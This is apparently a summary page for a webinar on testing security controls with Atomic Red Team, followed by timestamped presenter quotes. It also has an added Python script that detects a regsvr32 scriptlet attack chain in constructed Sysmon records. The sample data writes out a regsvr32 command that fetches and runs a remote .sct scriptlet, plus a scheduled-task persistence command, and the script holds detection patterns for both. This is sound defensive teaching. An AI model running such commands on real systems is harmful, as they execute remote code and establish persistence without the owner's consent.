Casey Smith Michael Haag

How to Test Your Security Controls Using Atomic Red Team


Learn an easy way to start testing your defenses across MITRE ATT&CK.

Watch an in-depth training on Atomic Red Team, a suite of small, highly portable detection tests mapped to MITRE ATT&CK.

Attendees will learn how to:

  • Run a basic atomic test (Regsvr32)
  • Test defenses against a chained attack
  • Measure progress and impact
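As an added example (not code from the webinar or from the Atomic Red Team project), the following Python script shows what those three items look like from the defender's side. It runs a Sysmon-style process-creation detector over constructed Event ID 1 records for the regsvr32 /i URL pattern used in the first lab, groups the hits per host to flag the regsvr32, discovery, scheduled-task sequence the second lab chains together, and produces a technique-by-technique detected/not-detected scorecard of the kind the third lab's progress tracking needs. The sample records, the detection heuristics and the thresholds are mine; the ATT&CK technique IDs use today's sub-technique numbering (for example T1218.010 for Regsvr32), which postdates the webinar.

```python
"""Sysmon-style detection of a regsvr32 atomic test and a simple attack chain."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Sysmon Event ID 1 (process creation) records, not real telemetry.
# Only the fields the detector reads are included.
SAMPLE_EVENTS = [
    {"UtcTime": "2018-03-01 10:00:01", "ComputerName": "WS01",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s /u /i:https://example.invalid/test.sct scrobj.dll"},
    {"UtcTime": "2018-03-01 10:00:07", "ComputerName": "WS01",
     "Image": r"C:\Windows\System32\whoami.exe", "CommandLine": "whoami /all"},
    {"UtcTime": "2018-03-01 10:00:09", "ComputerName": "WS01",
     "Image": r"C:\Windows\System32\net.exe", "CommandLine": "net user"},
    {"UtcTime": "2018-03-01 10:00:12", "ComputerName": "WS01",
     "Image": r"C:\Windows\System32\ipconfig.exe", "CommandLine": "ipconfig /all"},
    {"UtcTime": "2018-03-01 10:01:30", "ComputerName": "WS01",
     "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r"schtasks /create /sc minute /mo 1 /tn Updater /tr C:\Users\Public\u.bat"},
    # Benign: an installer registering a local COM DLL on another host.
    {"UtcTime": "2018-03-01 10:02:00", "ComputerName": "WS02",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s C:\Program Files\Vendor\vendor.dll"},
    {"UtcTime": "2018-03-01 10:02:05", "ComputerName": "WS02",
     "Image": r"C:\Windows\System32\whoami.exe", "CommandLine": "whoami"},
]

# /i: pointing at a URL, a UNC path or a scriptlet instead of a DLL (assumed heuristic).
REGSVR32_REMOTE = re.compile(r"/i:\s*(https?://|\\\\|\S+\.sct\b)", re.IGNORECASE)
DISCOVERY = {  # executable basename -> ATT&CK discovery technique (assumed mapping)
    "whoami.exe": "T1033", "net.exe": "T1087", "ipconfig.exe": "T1016",
    "systeminfo.exe": "T1082", "tasklist.exe": "T1057",
}
DISCOVERY_IDS = set(DISCOVERY.values())


def classify(event):
    """Return (technique_id, label) for a suspicious record, or None."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    cmd = event["CommandLine"]
    if image == "regsvr32.exe":
        if REGSVR32_REMOTE.search(cmd):
            return ("T1218.010", "regsvr32 with remote or scriptlet /i: argument")
        return None  # plain local DLL registration is everyday admin activity
    if image in DISCOVERY:
        if image == "net.exe" and not re.search(r"\b(user|group)\b", cmd, re.I):
            return None
        return (DISCOVERY[image], "discovery command")
    if image == "schtasks.exe" and re.search(r"/create\b", cmd, re.I):
        return ("T1053.005", "scheduled task created")
    return None


def detect(events):
    """Lab 1: run classify() over every record and keep the hits with host and time."""
    hits = []
    for ev in events:
        tag = classify(ev)
        if tag:
            hits.append({"host": ev["ComputerName"],
                         "time": datetime.strptime(ev["UtcTime"], "%Y-%m-%d %H:%M:%S"),
                         "technique": tag[0], "label": tag[1], "cmd": ev["CommandLine"]})
    return hits


def find_chains(hits, window=timedelta(minutes=30), min_discovery=2):
    """Lab 2: per host, regsvr32 followed by discovery and then persistence in one window."""
    by_host = defaultdict(list)
    for h in sorted(hits, key=lambda h: h["time"]):
        by_host[h["host"]].append(h)
    chains = []
    for host, seq in by_host.items():
        for i, start in enumerate(seq):
            if start["technique"] != "T1218.010":
                continue
            later = [h for h in seq[i + 1:] if h["time"] - start["time"] <= window]
            disc = [h for h in later if h["technique"] in DISCOVERY_IDS]
            persist = [h for h in later if h["technique"] == "T1053.005"
                       and disc and h["time"] > disc[0]["time"]]
            if len(disc) >= min_discovery and persist:
                chains.append({"host": host, "start": start["time"],
                               "techniques": [start["technique"]]
                               + [h["technique"] for h in disc + persist]})
    return chains


def coverage(hits, expected):
    """Lab 3 style scorecard: which of the techniques a test exercised produced a detection."""
    seen = {h["technique"] for h in hits}
    return {t: (t in seen) for t in expected}


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for h in found:
        print(f"{h['host']} {h['time']:%H:%M:%S} {h['technique']:10} {h['cmd']}")
    for c in find_chains(found):
        print("CHAIN on", c["host"], "->", " > ".join(c["techniques"]))
    print(coverage(found, ["T1218.010", "T1033", "T1087", "T1016", "T1082", "T1053.005"]))
```

The benign regsvr32 record on WS02 is the check that matters in practice: a rule that fires on every regsvr32.exe launch will drown in software installs, so the detector keys on the /i: argument pointing somewhere other than a local DLL, and the chain logic only counts a host where the initial execution is followed by enough discovery and then a persistence step within the window.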

00:14 Presenter Introduction

00:56 Webinar Agenda

02:49 Lab 1 – Regsvr32

06:17 “This has become a fairly popular ATT&CK technique over the last year.” -Casey

06:22 “Regsvr32 is a default tool inside of Windows, so it’s been with Windows since Windows XP all the way through to Windows 10.” -Casey

08:47 “/i is simply a parameter to Regsvr32, and this is where we actually pass the URL that we want to be executing into the system.” -Casey

14:51 Lab 1 – Questions & Answers

15:03 Question 1: How is Regsvr32 different from Rundll32?

15:58 “I would again drive you back to the MITRE framework. This framework has good distinctions about different techniques.” – Casey

17:29 Question 2: In any other security event logs, is there anything else within there that would trigger some kind of event that we could potentially correlate with Sysmon?

17:49 “I haven’t seen anything in any other logs at this point.” -Casey

18:15 Question 3: Is there a big difference when trying to detect this with Sysmon versus EDR solutions?

19:02 “There are multiple ways to do it with both of these products.” -Mike

19:40 Lab 2 – Chain Reaction

19:45 “Rarely does a technique occur in isolation.” -Casey

21:18  “The next phase of this test would be the attack enumerates a bunch of different things in your environment.” -Casey

22:00 “The second chain the attacker is going to run is a long sequence of discovery commands. The next chain of attack would be line 21 where we can actually schedule attack tasks for example.” -Casey

25:29 “We have Regsvr32 chained with a discovery chained with a persistence.” -Casey

25:50 Lab 2 – Questions & Answers

27:00  Question 1: Is the chaining technique effective over the long term? 

27:05  “Depending on scale, probably not… we’re really trying to get people started and batch files are the most simple way to do that.” -Casey

27:32  Question 2: Is there too much data to store across the full stack?

28:03 “Especially with Sysmon, you either collect everything or you filter out a lot of things and collect specific tasks that you’re executing.” -Mike

29:40 Lab 3 – Measuring Progress and Impact

32:49  “If I’m hunting one endpoint at a time, I’m not being completely effective.” -Mike

35:15  “You can pop over to the trends tab, and this is now where you can begin to see over time how you’ve been progressing.” -Mike

37:00 Lab 3 – Questions and Answers

37:05 Question 1: Have we automated the metrics with a SIEM to automatically generate metrics?

37:19 “That’s going to depend on all of the different SIEM platforms. I don’t know the best way to do that for everyone all at once.” -Mike

38:24 Question 2: Have there been any analytics run against the MITRE framework?

38:39 “There probably has, but I’m not sure. That is something I will have to follow up with.” -Casey

38:53 Question 3: What are things coming down the pipe on this project?

39:00 “One of the things we have looked at is expanding our ATT&CK chains. Maybe we want to provide some ATT&CK chains that model after a particular actor.” -Casey

39:50  “We would also like to look to the community and provide feedback on things they would like to see or where we could add additional techniques.” -Casey

41:29  Question 4: Any other recommendations other than Carbon Black?

41:40  “This framework is designed to test multiple different products.” -Casey

42:04  Question 5: In terms of testing solutions, how does the heat map allow you to differentiate between the threat blocked, threat detected, and threat information available and gathered for hunting?

42:30  “You will need to build out the other sections of the spreadsheet or just use it as a way to validate.” -Mike

42:53  Question 6: Are we looking at the possibility of some techniques to show the value of disrupting chains so that the deception techniques and disruption logs detection capabilities?

43:05  “As an adversary, if you land in your environment and know your telemetry is being studied, there is certainly value in disrupting and degrading the performance of that telemetry.” -Casey

43:35  Question 7: With certain APTs focusing on certain verticals, are there cases based upon those verticals?

43:47  “We hope you would be able to build these chain reactions that are specific to your industry.” -Casey
